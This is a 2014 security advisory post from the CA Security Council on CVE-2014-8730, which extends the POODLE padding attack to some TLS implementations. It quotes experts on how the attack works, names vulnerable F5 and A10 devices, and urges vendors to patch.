POODLE for TLS

Tuesday December 16, 2014

The POODLE attack on SSL 3.0 has now been extended to some implementations of TLS. POODLE for TLS can be tracked through CVE-2014-8730.

POODLE is not a flaw with the certificate authority (CA), SSL certificates or certificate management system. POODLE is a TLS implementation bug.

Adam Langley states that “TLS’s padding is a subset of SSLv3’s padding so, technically, you could use an SSLv3 decoding function with TLS and it would still work fine. It wouldn’t check the padding bytes but that wouldn’t cause any problems in normal operation. However, if an SSLv3 decoding function was used with TLS, then the POODLE attack would work, even against TLS connections.”

Ivan Ristić advises “The main target are browsers, because the attacker must inject malicious JavaScript to initiate the attack. A successful attack will use about 256 requests to uncover one cookie character, or only 4096 requests for a 16-character cookie. This makes the attack quite practical.”

Tests have shown that the F5 and A10 devices are vulnerable to POODLE for TLS. Qualys SSL Labs has extended their SSL Server Test to cover POODLE for TLS, so you can test your site. If the site is vulnerable it will receive an F grade.

Unlike POODLE for SSL 3.0, the industry is not in a position to turn off all of TLS to mitigate POODLE for TLS. As such vendors must patch to mitigate the vulnerability.

This article was originally published by the "CA Security Council". In 2021 the CASC was restructred and renamed to the "Public Key Infrastructure Consortium" shortly "PKI Consortium".

Learn more about the PKI Consortium
Participate in our community discussions and/or join the consortium